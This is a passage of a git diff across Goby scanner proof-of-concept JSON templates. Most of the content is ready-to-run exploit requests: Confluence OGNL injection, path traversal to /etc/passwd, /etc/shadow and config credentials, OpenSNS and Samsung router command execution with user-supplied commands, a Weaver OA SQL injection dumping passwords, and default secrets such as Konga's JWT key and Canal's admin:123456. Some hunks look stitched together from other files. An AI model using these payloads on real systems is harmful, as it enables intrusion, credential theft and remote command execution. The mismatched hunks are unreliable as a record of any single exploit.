"item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "value=\"aaaa{140592=null}", - "bz": "" - } - ] - }, - "SetVariable": [] - }, - { - "Request": { - "method": "POST", - "uri": "/confluence/pages/createpage-entervariables.action?SpaceKey=x", - "follow_redirect": true, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "value=\"aaaa{140592=null}", - "bz": "" - } - ] - }, - "SetVariable": [] - }, - { - "Request": { - "method": "POST", - "uri": "/confluence/pages/createpage-entervariables.action", - "follow_redirect": true, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "value=\"aaaa{140592=null}", - "bz": "" - } - ] - }, - "SetVariable": [] - }, - { - "Request": { - "method": "POST", - "uri": "/wiki/pages/createpage-entervariables.action?SpaceKey=x", - "follow_redirect": true, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "value=\"aaaa{140592=null}", - "bz": "" - } - ] - }, - "SetVariable": [] - }, - { - "Request": { - "method": "POST", - "uri": "/wiki/pages/createpage-entervariables.action", - "follow_redirect": true, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "value=\"aaaa{140592=null}", - "bz": "" - } - ] - }, - "SetVariable": [] - }, - { - "Request": { - "method": "POST", - "uri": "/pages/doenterpagevariables.action", - "follow_redirect": true, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "value=\"aaaa{140592=null}", - "bz": "" - } - ] - }, - "SetVariable": [] - }, - { - "Request": { - "method": "POST", - "uri": "/pages/createpage.action?spaceKey=myproj", - "follow_redirect": true, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "value=\"aaaa{140592=null}", - "bz": "" - } - ] - }, - "SetVariable": [] - }, - { - "Request": { - "method": "POST", - "uri": "/pages/templates2/viewpagetemplate.action", - "follow_redirect": true, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "value=\"aaaa{140592=null}", - "bz": "" - } - ] - }, - "SetVariable": [] - }, - { - "Request": { - "method": "POST", - "uri": "/pages/createpage-entervariables.action", - "follow_redirect": true, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "value=\"aaaa{140592=null}", - "bz": "" - } - ] - }, - "SetVariable": [] - }, - { - "Request": { - "method": "POST", - "uri": "/template/custom/content-editor", - "follow_redirect": true, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "value=\"aaaa{140592=null}", - "bz": "" - } - ] - }, - "SetVariable": [] - }, - { - "Request": { - "method": "POST", - "uri": "/templates/editor-preload-container", - "follow_redirect": true, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "value=\"aaaa{140592=null}", - "bz": "" - } - ] - }, - "SetVariable": [] - }, - { - "Request": { - "method": "POST", - "uri": "/users/user-dark-features", - "follow_redirect": true, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "value=\"aaaa{140592=null}", - "bz": "" - } - ] - }, - "SetVariable": [] + "SetVariable": [ + "output|lastbody|regex|" + ] } ], "ExploitSteps": [ @@ -483,7 +74,7 @@ { "Request": { "method": "POST", - "uri": "{{{Path}}}", + "uri": "/pages/createpage-entervariables.action?SpaceKey=x", "follow_redirect": true, "header": { "Content-Type": "application/x-www-form-urlencoded" @@ -510,6 +101,6 @@ ] } ], - "PostTime": "0000-00-00 00:00:00", - "GobyVersion": "0.0.0" + "PostTime": "2021-09-03 11:27:04", + "GobyVersion": "1.8.300" } \ No newline at end of file diff --git a/json/Cacti_Weathermap_File_Write.json b/json/Cacti_Weathermap_File_Write.json index 440107e..b3c1e1d 100644 --- a/json/Cacti_Weathermap_File_Write.json +++ b/json/Cacti_Weathermap_File_Write.json @@ -4,12 +4,12 @@ "Tags": [ "getshell" ], - "GobyQuery": "app=\"cacti-监控系统\" || title=\"Login to Cacti\" || app=\"Cactiez\"", - "Description": "Cacti provides a robust and extensible operational monitoring and fault management framework for users around the world. Is also a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality.", - "Product": "cacti", + "GobyQuery": "(app=\"cacti-监控系统\"|title=\"Login to Cacti\"|app=\"Cactiez\")", + "Description": "allows remote attackers to upload and execute arbitrary files", + "Product": "cacti-监控系统", "Homepage": "https://www.cacti.net/", - "Author": "", - "Impact": "Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.", + "Author": "aetkrad", + "Impact": "Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.
Attackers can read arbitrary files to obtain sensitive information of the server
undefined
", "References": [ - "https://gobies.org/" + "http://wiki.peiqi.tech" ], + "HasExp": true, + "ExpParams": [ + { + "name": "File", + "type": "select", + "value": "windows/win.ini", + "show": "" + } + ], "ScanSteps": [ "OR", { @@ -42,6 +53,20 @@ "operation": "contains", "value": "font", "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "file", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "extension", + "bz": "" } ] }, @@ -75,12 +100,59 @@ "operation": "contains", "value": "font", "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "extension", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "file", + "bz": "" } ] }, "SetVariable": [] } ], - "PostTime": "2021-04-07 15:10:20", + "ExploitSteps": [ + "OR", + { + "Request": { + "method": "GET", + "uri": "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/", + "follow_redirect": false, + "header": { + "Content-Type": "application/octet-stream" + }, + "data_type": "text", + "data": "" + }, + "SetVariable": [ + "output|lastbody" + ] + }, + { + "Request": { + "method": "GET", + "uri": "/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/", + "follow_redirect": false, + "header": { + "Content-Type": "application/octet-stream" + }, + "data_type": "text", + "data": "" + }, + "SetVariable": [ + "output|lastbody" + ] + } + ], + "PostTime": "2021-04-07 21:05:13", "GobyVersion": "1.8.255" } \ No newline at end of file diff --git a/json/Jitong_EWEBS_phpinfo_leak.json b/json/Jitong_EWEBS_phpinfo_leak.json index 9b579f8..5f1d567 100644 --- a/json/Jitong_EWEBS_phpinfo_leak.json +++ b/json/Jitong_EWEBS_phpinfo_leak.json @@ -1,23 +1,17 @@ { - "Name": "Jitong EWEBS phpinfo leak", - "Level": "0", - "Tags": [ - "infoleak" - ], + "Name": "极通EWEBSphpinfo泄露", + "Level": "3", + "Tags": [], "GobyQuery": "body=\"极通软件\"", "Description": "", - "Product": "Jitong EWEBS", - "Homepage": "http://www.n-soft.com.cn/", - "Author": "", - "Impact": "Jitong EWEBS phpinfo leak", - "Recommendation": "", - "References": [], - "HasExp": true, - "ExpParams": null, - "ExpTips": { - "Type": "", - "Content": "" - }, + "Product": "", + "Homepage": "https://gobies.org/", + "Author": "gobysec@gmail.com", + "Impact": "", + "Recommandation": "", + "References": [ + "https://gobies.org/" + ], "ScanSteps": [ "AND", { @@ -25,7 +19,7 @@ "method": "GET", "uri": "/testweb.php", "follow_redirect": false, - "header": null, + "header": {}, "data_type": "text", "data": "" }, @@ -45,34 +39,6 @@ "SetVariable": [] } ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/testweb.php", - "follow_redirect": false, - "header": null, - "data_type": "text", - "data": "", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "PHP Version", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "PostTime": "0000-00-00 00:00:00", - "GobyVersion": "0.0.0" + "PostTime": "2021-06-17 21:19:12", + "GobyVersion": "1.8.268" } \ No newline at end of file diff --git a/json/Konga_Default_JWT_KEY.json b/json/Konga_Default_JWT_KEY.json index c5525c9..b79727c 100644 --- a/json/Konga_Default_JWT_KEY.json +++ b/json/Konga_Default_JWT_KEY.json @@ -4,12 +4,12 @@ "Tags": [ "defaultaccount" ], - "GobyQuery": "title=\"Konga\" || body=\"window.konga_version\"", - "Description": "Konga offers the tools you need to manage your Kong cluster with ease.", + "GobyQuery": "(title==\"Konga\" | body=\"window.konga_version\")", + "Description": "Konga JWT默认key为oursecret,可伪造任意用户权限。", "Product": "Konga", "Homepage": "https://github.com/pantsel/konga", - "Author": "", - "Impact": "The default key of Konga JWT is oursecret, which can forge arbitrary user permissions.", + "Author": "aetkrad", + "Impact": "", "Recommendation": "", "References": [ "https://mp.weixin.qq.com/s/8guU2hT3wE2puEztdGqZQg" @@ -112,6 +112,6 @@ ] } ], - "PostTime": "0000-00-00 00:00:00", - "GobyVersion": "0.0.0" + "PostTime": "2021-12-03 18:50:39", + "GobyVersion": "1.9.310" } \ No newline at end of file diff --git a/json/Lanproxy_Directory_traversal_CVE_2021_3019.json b/json/Lanproxy_Directory_traversal_CVE_2021_3019.json index 8f5fab1..66130fd 100644 --- a/json/Lanproxy_Directory_traversal_CVE_2021_3019.json +++ b/json/Lanproxy_Directory_traversal_CVE_2021_3019.json @@ -1,44 +1,36 @@ { - "Name": "Lanproxy Directory Traversal CVE-2021-3019", + "Name": "Lanproxy目录遍历 CVE-2021-3019", "Level": "2", - "Tags": [ - "Directory Traversal" - ], - "GobyQuery": "header=\"Server: LPS-0.1\"", - "Description": "Lanproxy is a reverse proxy to help you expose a local server behind a NAT or firewall to the internet. it supports any protocols over tcp (http https ssh ...)", - "Product": "ffay lanproxy 0.1", - "Homepage": "https://github.com/ffay/lanproxy", - "Author": "", - "Impact": "ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet.", - "Recommendation": "", + "Tags": [], + "GobyQuery": "header= \"Server: LPS-0.1\"", + "Description": "lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,目前仅支持tcp流量转发,可支持任何tcp上层协议(ssh访问、web服务器访问、远程桌面...)。", + "Product": "", + "Homepage": "https://gobies.org/", + "Author": "luckying", + "Impact": "", + "Recommandation": "", "References": [ - "https://github.com/ffay/lanproxy/commits/master", - "https://github.com/maybe-why-not/lanproxy/issues/1", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3019" + "https://gobies.org/" ], - "HasExp": true, - "ExpParams": [ - { - "Name": "Filename", - "Type": "select", - "Value": "/../../../../../../../../../../etc/passwd,/../conf/config.properties,/../../../../../../../../../../etc/shadow" - } - ], - "ExpTips": { - "Type": "", - "Content": "" - }, + "HasExp": true, + "ExpParams": [ + { + "name": "path", + "type": "input", + "value": "/../conf/config.properties", + "show": "" + } + ], "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/../conf/config.properties", - "follow_redirect": true, - "header": null, + "follow_redirect": false, + "header": {}, "data_type": "text", - "data": "", - "set_variable": [] + "data": "" }, "ResponseTest": { "type": "group", @@ -55,7 +47,34 @@ "type": "item", "variable": "$body", "operation": "contains", - "value": "server.ssl", + "value": "config.admin", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "{{{path}}}", + "follow_redirect": false, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", "bz": "" }, { @@ -68,40 +87,10 @@ ] }, "SetVariable": [ - "output|lastbody|regex|" - ] + "output|lastbody" + ] } ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "{{{Filename}}}", - "follow_redirect": true, - "header": null, - "data_type": "text", - "data": "", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - } - ] - }, - "SetVariable": [ - "output|lastbody|regex|" - ] - } - ], - "PostTime": "0000-00-00 00:00:00", - "GobyVersion": "0.0.0" + "PostTime": "2021-06-24 17:23:13", + "GobyVersion": "1.8.268" } \ No newline at end of file diff --git a/json/OpenSNS_RCE.json b/json/OpenSNS_RCE.json index dd60778..75c0137 100644 --- a/json/OpenSNS_RCE.json +++ b/json/OpenSNS_RCE.json @@ -1,32 +1,28 @@ { - "Name": "OpenSNS RCE", + "Name": "OpenSNS 远程代码执行漏洞", "Level": "3", "Tags": [ "RCE" ], "GobyQuery": "body=\"opensns\"", - "Description": "OpenSNS is a comprehensive social software developed by Xiangtian Technology.", + "Description": "OpenSNS是想天科技开发的一款综合性社交软件,存在命令执行漏洞且是administrator", "Product": "OpenSNS", "Homepage": "http://www.opensns.cn/", - "Author": "", - "Impact": "A vulnerability in OpenSNS allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 'shareBox' endpoint.", - "Recommendation": "", + "Author": "luckying", + "Impact": "", + "Recommandation": "", "References": [ - "http://www.0dayhack.net/index.php/2417/", - "https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E" + "https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-cn" ], - "HasExp": true, - "ExpParams": [ - { - "Name": "Cmd", - "Type": "input", - "Value": "whoami" - } - ], - "ExpTips": { - "Type": "", - "Content": "" - }, + "HasExp": true, + "ExpParams": [ + { + "name": "Cmd", + "type": "input", + "value": "whoami", + "show": "" + } + ], "ScanSteps": [ "AND", { @@ -34,7 +30,7 @@ "method": "GET", "uri": "/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ipconfig)", "follow_redirect": false, - "header": null, + "header": {}, "data_type": "text", "data": "" }, @@ -54,14 +50,14 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system({{{Cmd}}})", "follow_redirect": false, - "header": null, + "header": {}, "data_type": "text", "data": "" }, @@ -79,10 +75,10 @@ ] }, "SetVariable": [ - "output|lastbody|undefined|undefined" - ] + "output|lastbody" + ] } ], - "PostTime": "0000-00-00 00:00:00", - "GobyVersion": "0.0.0" + "PostTime": "2021-06-28 11:44:33", + "GobyVersion": "1.8.268" } \ No newline at end of file diff --git a/json/RuoYi_Druid_Unauthorized_access.json b/json/RuoYi_Druid_Unauthorized_access.json index 4c5fc4d..0e00144 100644 --- a/json/RuoYi_Druid_Unauthorized_access.json +++ b/json/RuoYi_Druid_Unauthorized_access.json @@ -2,22 +2,18 @@ "Name": "RuoYi Druid Unauthorized access", "Level": "0", "Tags": [ - "infoleak" + "Disclosure of Sensitive Information" ], "GobyQuery": "app=\"ruoyi-System\"", - "Description": "RuoYi", + "Description": "If Druid is used in the management system, anonymous access is enabled by default, resulting in unauthorized access to sensitive information", "Product": "RuoYi", "Homepage": "https://gitee.com/y_project/RuoYi-Vue", - "Author": "", - "Impact": "If Druid is used in the management system, anonymous access is enabled by default, resulting in unauthorized access to sensitive information.", - "Recommendation": "", - "References": [], - "HasExp": true, - "ExpParams": null, - "ExpTips": { - "Type": "", - "Content": "" - }, + "Author": "PeiQi", + "Impact": " resulting in unauthorized access to sensitive information
暂无
", + "Recommandation": "暂无
", + "References": [ + "Internet" ], - "ExpTips": { - "Type": "", - "Content": "" - }, "ScanSteps": [ "AND", { "Request": { - "method": "GET", + "method": "POST", "uri": "/(download)/tmp/a.txt", - "follow_redirect": false, + "follow_redirect": true, "header": { - "Content-Type": "application/json;charset=UTF-8" + "Connection": "close", + "Content-Length": "48" }, "data_type": "text", - "data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt", - "set_variable": [] + "data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt" }, "ResponseTest": { "type": "group", @@ -58,43 +46,9 @@ } ] }, - "SetVariable": [ - "output|lastbody|regex|" - ] + "SetVariable": [] } ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/(download)/tmp/a.txt", - "follow_redirect": false, - "header": { - "Content-Type": "application/json;charset=UTF-8" - }, - "data_type": "text", - "data": "command1=shell:{{{Cmd}}}| dd of=/tmp/a.txt", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - } - ] - }, - "SetVariable": [ - "output|lastbody|regex|" - ] - } - ], - "PostTime": "0000-00-00 00:00:00", - "GobyVersion": "0.0.0" + "PostTime": "2021-04-01 11:47:39", + "GobyVersion": "1.8.237" } \ No newline at end of file diff --git a/json/Samsung_WLAN_AP_wea453e_router_RCE.json b/json/Samsung_WLAN_AP_wea453e_router_RCE.json index fcab6f2..fac7a7d 100644 --- a/json/Samsung_WLAN_AP_wea453e_router_RCE.json +++ b/json/Samsung_WLAN_AP_wea453e_router_RCE.json @@ -1,175 +1,82 @@ { - - "Name": "Samsung WLAN AP wea453e router RCE", - - "Level": "3", - - "Tags": [ - - "rce", - - "getshell" - - ], - - "GobyQuery": "app=\"Chunjs-server\" && body=\"Samsung Electronics\"", - - "Description": "xxxx", - - "Product": "xxxxxx", - - "Homepage": "https://gobies.org/", - - "Author": "gobysec@gmail.com", - - "Impact": "xxxx
", - - "Recommendation": "xxxxx
", - - "References": [ - - "https://gobies.org/" - - ], - - "HasExp": true, - - "ExpParams": [{ - - "Name": "cmd", - - "Type": "input", - - "Value": "ls" - - }], - - "ExpTips": { - - "Type": "", - - "Content": "" - - }, - - "ScanSteps": [ - - "AND", - - { - - "Request": { - - "method": "POST", - - "uri": "/(download)/tmp/a.txt", - - "follow_redirect": true, - - "header": null, - - "data_type": "text", - - "data": "command1=shell:ifconfig| dd of=/tmp/a.txt", - - "set_variable": [] - - }, - - "ResponseTest": { - - "type": "group", - - "operation": "AND", - - "checks": [{ - - "type": "item", - - "variable": "$code", - - "operation": "==", - - "value": "200", - - "bz": "" - - }, - - { - - "type": "item", - - "variable": "$body", - - "operation": "contains", - - "value": "eth0", - - "bz": "" - - } - - ] - - }, - - "SetVariable": [ - - "output|lastbody|regex|" - - ] - - } - - ], - - "ExploitSteps": [ - - "AND", - - { - - "Request": { - - "method": "POST", - - "uri": "/(download)/tmp/a.txt", - - "follow_redirect": true, - - "header": null, - - "data_type": "text", - - "data": "command1=shell:{{{cmd}}} | dd of=/tmp/a.txt", - - "set_variable": [] - - }, - - "ResponseTest": { - - "type": "group", - - "operation": "AND", - - "checks": [] - - }, - - "SetVariable": [ - - "output|lastbody||" - - ] - - } - - ], - - "PostTime": "2021-11-26 19:12:54", - - "GobyVersion": "1.9.310" - + "Name": "Samsung WLAN AP wea453e router RCE", + "Level": "3", + "Tags": [ + "RCE" + ], + "GobyQuery": "app=\"Chunjs-server\" && body=\"Samsung Electronics\"", + "Description": "Samsung WLAN AP wea453e router has a remote command execution vulnerability. It can execute arbitrary commands without authorization to obtain server permissions", + "Product": "Samsung WLAN AP wea453e router", + "Homepage": "https://www.samsung.com/cn/", + "Author": "PeiQi", + "Impact": "Execute any command to get the server permission
can perform server-side request forgery attack to steal management credentials.
undefined
", "References": [ - "https://nvd.nist.gov/vuln/detail/CVE-2021-21975", - "https://www.vmware.com/security/advisories/VMSA-2021-0004.html" + "http://wiki.peiqi.tech" ], - "HasExp": true, - "ExpParams": null, - "ExpTips": { - "Type": "", - "Content": "" - }, "ScanSteps": [ "AND", { @@ -71,7 +64,7 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { @@ -118,9 +111,11 @@ } ] }, - "SetVariable": [] + "SetVariable": [ + "output|lastbody" + ] } ], - "PostTime": "0000-00-00 00:00:00", - "GobyVersion": "0.0.0" + "PostTime": "2021-04-07 23:45:28", + "GobyVersion": "1.8.255" } \ No newline at end of file diff --git a/json/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json b/json/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json index d106efe..670e4b2 100644 --- a/json/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json +++ b/json/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json @@ -8,7 +8,7 @@ "Description": "VMware vCenter Server is advanced server management software that provides a centralized platform for controlling your VMware vSphere environments, allowing you to automate and deliver a virtual infrastructure across the hybrid cloud with confidence.", "Product": "VMware-vCenter", "Homepage": "https://www.vmware.com/products/vcenter-server.html", - "Author": "", + "Author": "aetkrad", "Impact": "", "Recommendation": "", "References": [ @@ -100,6 +100,6 @@ ] } ], - "PostTime": "0000-00-00 00:00:00", - "GobyVersion": "0.0.0" + "PostTime": "2021-12-02 18:50:55", + "GobyVersion": "1.9.310" } \ No newline at end of file diff --git a/json/Weaver_OA_8_SQL_injection.json b/json/Weaver_OA_8_SQL_injection.json index e59fe29..b523bde 100644 --- a/json/Weaver_OA_8_SQL_injection.json +++ b/json/Weaver_OA_8_SQL_injection.json @@ -5,19 +5,15 @@ "SQL Injection" ], "GobyQuery": "app=\"Weaver-OA\"", - "Description": "", + "Description": "There is a SQL injection vulnerability in Pan micro OA V8, through which an attacker can obtain administrator and server privileges", "Product": "Weaver OA 8", - "Homepage": "https://weaver.com/", - "Author": "", - "Impact": "There is a SQL injection vulnerability in Pan micro OA V8, through which an attacker can obtain administrator and server privileges.", - "Recommendation": "", - "References": [], - "HasExp": false, - "ExpParams": null, - "ExpTips": { - "Type": "", - "Content": "" - }, + "Homepage": "https://www.weaver.com.cn/", + "Author": "PeiQi", + "Impact": "", + "Recommandation": "undefined
", + "References": [ + "http://wiki.peiqi.tech" + ], "ScanSteps": [ "AND", { @@ -25,7 +21,7 @@ "method": "GET", "uri": "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager", "follow_redirect": false, - "header": null, + "header": {}, "data_type": "text", "data": "" }, @@ -51,7 +47,7 @@ "type": "item", "variable": "$body", "operation": "not contains", - "value": "<html>", + "value": "", "bz": "" }, { @@ -66,6 +62,6 @@ "SetVariable": [] } ], - "PostTime": "0000-00-00 00:00:00", - "GobyVersion": "0.0.0" + "PostTime": "2021-04-10 08:00:20", + "GobyVersion": "1.8.255" } \ No newline at end of file diff --git a/json/YAPI_RCE.json b/json/YAPI_RCE.json index f72040a..b796f28 100644 --- a/json/YAPI_RCE.json +++ b/json/YAPI_RCE.json @@ -4,20 +4,17 @@ "Tags": [ "rce" ], - "GobyQuery": "app=\"YAPI\" || title==\"YApi-高效、易用、功能强大的可视化接口管理平台\" || title==\"YApi Pro-高效、易用、功能强大的可视化接口管理平台\"", - "Description": "YApi is an efficient, easy-to-use and powerful visual interface management platform.", + "GobyQuery": "(app=\"YAPI\" | title==\"YApi-高效、易用、功能强大的可视化接口管理平台\" | title==\"YApi Pro-高效、易用、功能强大的可视化接口管理平台\")", + "Description": "YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI发布在公网且开发注册,会导致攻击者注册后执行任意命令。", "Product": "YAPI", "Homepage": "https://github.com/YMFE/yapi", - "Author": "", - "Impact": "A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code.", + "Author": "aetkrad", + "Impact": "", "Recommendation": "", "References": [ - "https://www.secpulse.com/archives/162502.html", - "https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b", - "https://twitter.com/sec715/status/1415484190561161216", "https://mp.weixin.qq.com/s/zobag3-fIl_0vrc8BrnRjg" ], - "HasExp": true, + "HasExp": false, "ExpParams": null, "ExpTips": { "Type": "", @@ -67,43 +64,6 @@ ] } ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/test.php", - "follow_redirect": true, - "header": null, - "data_type": "text", - "data": "", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "test", - "bz": "" - } - ] - }, - "SetVariable": [ - "output|lastbody|regex|" - ] - } - ], - "PostTime": "0000-00-00 00:00:00", - "GobyVersion": "0.0.0" + "PostTime": "2021-12-01 20:34:40", + "GobyVersion": "1.9.310" } \ No newline at end of file diff --git a/json/alibaba_canal_default_password.json b/json/alibaba_canal_default_password.json index ee40781..bd3b0b6 100644 --- a/json/alibaba_canal_default_password.json +++ b/json/alibaba_canal_default_password.json @@ -1,20 +1,18 @@ { - "Name": "Alibaba Canal Default Password", - "Level": "2", + "Name": "alibaba canal default password", + "Level": "3", "Tags": [ "defaultaccount" ], - "GobyQuery": "title=\"Canal Admin\" || body=\"Canal Admin Login\"", - "Description": "Alibaba Canal is Incremental log parsing based on MySQL database, providing incremental data subscription and consumption.", - "Product": "Alibaba Canal", + "GobyQuery": "(title=\"Canal Admin\"|body=\"Canal Admin Login\")", + "Description": "alibaba canal has a default password problem. Attackers can log in through admin:123456", + "Product": "Remote attacker can use this default to control the system", "Homepage": "https://github.com/alibaba/canal", - "Author": "", - "Impact": "Alibaba Canal has a default password vulnerability, an attacker can use the administrator account admin:123456 login.", - "Recommendation": "Modify Alibaba Canal administrator's default password.", - "References": [ - "https://github.com/alibaba/canal/wiki/ClientAdapter" - ], - "HasExp": true, + "Author": "aetkrad", + "Impact": "", + "Recommendation": "", + "References": [], + "HasExp": false, "ExpParams": null, "ExpTips": { "Type": "", @@ -130,6 +128,6 @@ ] } ], - "PostTime": "0000-00-00 00:00:00", - "GobyVersion": 